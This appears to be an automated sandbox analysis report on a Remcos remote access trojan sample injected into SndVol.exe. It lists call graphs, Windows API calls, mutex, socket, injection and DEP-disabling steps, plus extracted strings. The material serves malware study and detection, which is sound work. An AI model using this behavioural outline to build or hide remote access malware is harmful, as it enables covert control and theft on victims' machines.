94221->94223 94286 4034c6 28 API calls 94222->94286 94224 402868 22 API calls 94223->94224 94225 404386 94224->94225 94227 4043f9 94225->94227 94228 40439f 94225->94228 94287 402884 22 API calls 94227->94287 94230 4027c6 28 API calls 94228->94230 94239 40437c 94228->94239 94230->94239 94239->94219 94286->94239 94288->93615 94292 4198da ctype ___scrt_get_show_window_mode 94290->94292 94291 402073 28 API calls 94293 41399f 94291->94293 94292->94291 94293->93626 94294->93643 94296 413958 getaddrinfo WSASetLastError 94295->94296 94297 41394e 94295->94297 94296->93671 94410 4137dc 29 API calls ___std_exception_copy 94297->94410 94299 413953 94299->94296 94301 404826 socket 94300->94301 94302 404819 94300->94302 94304 404840 CreateEventW 94301->94304 94305 404822 94301->94305 94411 40487e WSAStartup 94302->94411 94304->93671 94305->93671 94306 40481e 94306->94301 94306->94305 94308 404f45 94307->94308 94309 404fca 94307->94309 94310 404f4e 94308->94310 94311 404fa0 CreateEventA CreateThread 94308->94311 94312 404f5d GetLocalTime 94308->94312 94309->93671 94310->94311 94311->94309 94413 405130 94311->94413 94412 419b16 28 API calls 94312->94412 94314 404f71 94315 4052dd 28 API calls 94314->94315 94316 404f81 94315->94316 94317 402073 28 API calls 94316->94317 94318 404f90 94317->94318 94319 4194da 79 API calls 94318->94319 94320 404f95 94319->94320 94321 401fb8 11 API calls 94320->94321 94321->94311 94323 4049fb 94322->94323 94324 4048ce 94322->94324 94325 404a01 WSAGetLastError 94323->94325 94375 40495e 94323->94375 94326 404903 94324->94326 94328 4052fe 28 API calls 94324->94328 94324->94375 94327 404a11 94325->94327 94325->94375 94417 41ea15 27 API calls 94326->94417 94329 404912 94327->94329 94330 404a16 94327->94330 94332 4048ef 94328->94332 94335 402073 28 API calls 94329->94335 94428 41a86b 30 API calls 94330->94428 94336 402073 28 API calls 94332->94336 94334 40490b 94334->94329 94338 404921 94334->94338 94339 404a60 94335->94339 94340 4048fe 94336->94340 94337 404a20 94341 4052dd 28 API calls 94337->94341 94345 404930 94338->94345 94346 404967 94338->94346 94342 402073 28 API calls 94339->94342 94343 4194da 79 API calls 94340->94343 94344 404a30 94341->94344 94347 404a6f 94342->94347 94343->94326 94348 402073 28 API calls 94344->94348 94349 402073 28 API calls 94345->94349 94425 41f7f5 53 API calls 94346->94425 94350 4194da 79 API calls 94347->94350 94352 404a3f 94348->94352 94353 40493f 94349->94353 94350->94375 94355 4194da 79 API calls 94352->94355 94356 402073 28 API calls 94353->94356 94354 40496f 94357 4049a4 94354->94357 94358 404974 94354->94358 94359 404a44 94355->94359 94362 40494e 94356->94362 94427 41ebbb 28 API calls 94357->94427 94360 402073 28 API calls 94358->94360 94361 401fb8 11 API calls 94359->94361 94364 404983 94360->94364 94361->94375 94365 4194da 79 API calls 94362->94365 94367 402073 28 API calls 94364->94367 94380 404953 94365->94380 94366 4049ac 94368 4049d9 CreateEventW CreateEventW 94366->94368 94370 402073 28 API calls 94366->94370 94369 404992 94367->94369 94368->94375 94371 4194da 79 API calls 94369->94371 94373 4049c2 94370->94373 94374 404997 94371->94374 94376 402073 28 API calls 94373->94376 94426 41ee67 51 API calls 94374->94426 94375->93671 94378 4049d1 94376->94378 94379 4194da 79 API calls 94378->94379 94381 4049d6 94379->94381 94418 41ea55 94380->94418 94381->94368 94383 404e20 SetEvent CloseHandle 94382->94383 94384 404e37 closesocket 94382->94384 94385 404eb8 94383->94385 94386 404e44 94384->94386 94385->93671 94387 404e53 94386->94387 94388 404e5a 94386->94388 94431 4050c4 83 API calls 94387->94431 94390 404e6c WaitForSingleObject 94388->94390 94391 404eae SetEvent CloseHandle 94388->94391 94392 41ea55 3 API calls 94390->94392 94391->94385 94393 404e7b SetEvent WaitForSingleObject 94392->94393 94394 41ea55 3 API calls 94393->94394 94395 404e93 SetEvent CloseHandle CloseHandle 94394->94395 94395->94391 94396->93671 94397->93671 94398->93671 94399->93671 94400->93671 94401->93709 94402->93709 94403->93709 94404->93709 94405->93709 94406->93709 94407->93709 94408->93709 94409->93709 94410->94299 94411->94306 94412->94314 94416 40513c 101 API calls 94413->94416 94415 405139 94416->94415 94417->94334 94419 41c4c6 94418->94419 94420 41ea5d 94418->94420 94421 41c4d4 94419->94421 94429 41b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94419->94429 94420->94375 94430 41c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94421->94430 94424 41c4db 94425->94354 94426->94380 94427->94366 94428->94337 94429->94421 94430->94424 94431->94388 94433->93737 94434->93763 94435->93762 94436->93751 94437->93755 94438->93761 94441 40e1a8 94439->94441 94440 411f34 3 API calls 94440->94441 94441->94440 94442 40e24e 94441->94442 94444 40e23e Sleep 94441->94444 94449 40e1da 94441->94449 94445 408098 28 API calls 94442->94445 94443 408098 28 API calls 94443->94449 94444->94441 94448 40e25b 94445->94448 94475 419bca 28 API calls 94448->94475 94449->94443 94449->94444 94454 401ee9 11 API calls 94449->94454 94458 402073 28 API calls 94449->94458 94461 41215f 14 API calls 94449->94461 94472 40bc59 110 API calls ___scrt_get_show_window_mode 94449->94472 94473 419bca 28 API calls 94449->94473 94474 412204 14 API calls 94449->94474 94451 40e267 94476 412204 14 API calls 94451->94476 94454->94449 94455 40e27a 94456 401ee9 11 API calls 94455->94456 94457 40e286 94456->94457 94459 402073 28 API calls 94457->94459 94458->94449 94460 40e297 94459->94460 94462 41215f 14 API calls 94460->94462 94461->94449 94463 40e2aa 94462->94463 94477 4112b5 TerminateProcess WaitForSingleObject 94463->94477 94465 40e2b2 ExitProcess 94478 411253 61 API calls 94469->94478 94473->94449 94474->94449 94475->94451 94476->94455 94477->94465

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00411F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                    • Part of subcall function 00411F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                    • Part of subcall function 00411F34: RegCloseKey.KERNEL32(?), ref: 00411F7D
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                                                  • ExitProcess.KERNEL32 ref: 0040E2B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                  • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                                                  • API String ID: 2281282204-1386060931
                                                                  • Opcode ID: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                  • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                  • Opcode Fuzzy Hash: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                  • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                  APIs
                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,02AE0880), ref: 004315FE
                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID:
                                                                  • API String ID: 1815803762-0
                                                                  • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                  • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                  • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                  • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 048E12B7
                                                                  • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 048E140E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocLibraryLoadVirtual
                                                                  • String ID:
                                                                  • API String ID: 3550616410-0
                                                                  • Opcode ID: 670503aa5bbd05ca500e2d418a3d0f65381e2a465829afc3588e233f9a99613e
                                                                  • Instruction ID: 35644f515713817de6d4722897009be6858d8b9351167785276bb91757a4887b
                                                                  • Opcode Fuzzy Hash: 670503aa5bbd05ca500e2d418a3d0f65381e2a465829afc3588e233f9a99613e
                                                                  • Instruction Fuzzy Hash: E8C1B071A00204AFDB24CF6ACC88BAAB7B6FF86314F148659E845EB655D770F901CB50
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                  • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                  • Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                  • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: recv
                                                                  • String ID:
                                                                  • API String ID: 1507349165-0
                                                                  • Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                  • Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
                                                                  • Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                  • Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                  • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                  • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                  • API String ID: 551388010-2474455403
                                                                  • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                  • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                  • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                  • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 81 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->81 82 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->82 90 40d991-40d99a call 401fb8 81->90 91 40d67f-40d686 81->91 98 40d622-40d63f call 401f8b call 411f34 82->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 82->99 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->109 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 107 40d6b0-40d6b4 95->107 108 40d6a9-40d6ab 95->108 123 40d651 98->123 124 40d641-40d650 call 401f8b call 41239a 98->124 99->98 133 40dd2c 105->133 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 138 40d6cb-40d6d1 113->138 140 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->140 141 40d72c call 40e501 114->141 123->81 124->123 139 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 133->139 138->114 144 40d6d3-40d6d9 138->144 189 40dd6a-40dd6f call 413980 139->189 217 40d815-40d819 140->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 140->218 141->140 151 40d6f7-40d710 call 401f8b call 411eea 144->151 152 40d6db-40d6ee call 4060ea 144->152 151->114 178 40d712 call 4066a6 151->178 152->114 166 40d6f0-40d6f5 call 4067a0 152->166 166->114 220 40da61-40da63 175->220 221 40da65-40da67 175->221 178->114 217->109 219 40d81f-40d826 217->219 218->217 249 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 218->249 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 237 40d8b6-40d8de call 40245c call 43254d 223->237 224->237 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 237->255 256 40d8e0-40d8ee call 434c30 237->256 249->217 262 40d8f2-40d93d call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 255->262 256->262 317 40d942-40d967 call 432556 call 401e45 call 40fbab 262->317 317->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 317->332 332->175 346 40d98e-40d990 332->346 346->90 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 384 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->384 385 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->385 373->372 384->385 404 40dcc1-40dcc2 SetProcessDEPPolicy 385->404 405 40dcc4-40dcd7 CreateThread 385->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->133 416 40dd03-40dd06 412->416 413->412 416->189 418 40dd08-40dd0d 416->418 418->139
                                                                  APIs
                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                    • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                  • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                  • API String ID: 1529173511-699997109
                                                                  • Opcode ID: c0fe3bac613a94c9405e0ca8567cef12f3d36445c9fd90bd399c2b6a79ce31d1
                                                                  • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                  • Opcode Fuzzy Hash: c0fe3bac613a94c9405e0ca8567cef12f3d36445c9fd90bd399c2b6a79ce31d1
                                                                  • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 420 413980-4139c8 call 4020bf call 419894 call 4020bf call 401e45 call 401f8b call 439867 433 4139d7-413a23 call 402073 call 401e45 call 4020d6 call 419d87 call 40487e call 401e45 call 40fbab 420->433 434 4139ca-4139d1 Sleep 420->434 449 413a25-413a94 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 433->449 450 413a97-413b32 call 402073 call 401e45 call 4020d6 call 419d87 call 401e45 * 2 call 40822a call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 433->450 434->433 449->450 503 413b42-413b49 450->503 504 413b34-413b40 450->504 505 413b4e-413be0 call 405a86 call 4052fe call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 41393f 503->505 504->505 532 413be2-413c26 WSAGetLastError call 41a86b call 4052dd call 402073 call 4194da call 401fb8 505->532 533 413c2b-413c39 call 40480d 505->533 556 414493-4144a5 call 404e06 call 4021da 532->556 538 413c66-413c74 call 404f31 call 4048a8 533->538 539 413c3b-413c61 call 402073 * 2 call 4194da 533->539 552 413c79-413c7b 538->552 539->556 555 413c81-413dd4 call 401e45 * 2 call 4052fe call 408209 call 402ef0 call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 4 call 4197c1 call 413013 call 408098 call 43f34f call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4120e8 552->555 552->556 620 413dd6-413de3 call 405a86 555->620 621 413de8-413e0f call 401f8b call 411f91 555->621 569 4144a7-4144c7 call 401e45 call 401f8b call 439867 Sleep 556->569 570 4144cd-4144d5 call 401e6d 556->570 569->570 570->450 620->621 627 413e11-413e13 621->627 628 413e16-414406 call 40415e call 419c8a call 419b16 call 401e45 GetTickCount call 419b16 call 419ac6 call 419b16 call 419a77 call 419c8a * 5 call 40e2bb call 419c8a call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408209 call 402ef0 call 408209 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 40826c call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408209 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 6 call 404a81 call 401fb8 * 48 call 401ee9 call 401fb8 * 4 call 401ee9 call 404bf0 621->628 627->628 856 414408-41440f 628->856 857 41441a-414421 628->857 856->857 860 414411-414413 856->860 858 414423-414428 call 409f9a 857->858 859 41442d-41445f call 405a4b call 402073 * 2 call 4194da 857->859 858->859 871 414461-41446d CreateThread 859->871 872 414473-41448e call 401fb8 * 2 call 401ee9 859->872 860->857 871->872 872->556
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,00000029,756F0F10,00471FFC,00000000), ref: 004139D1
                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 004144C7
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
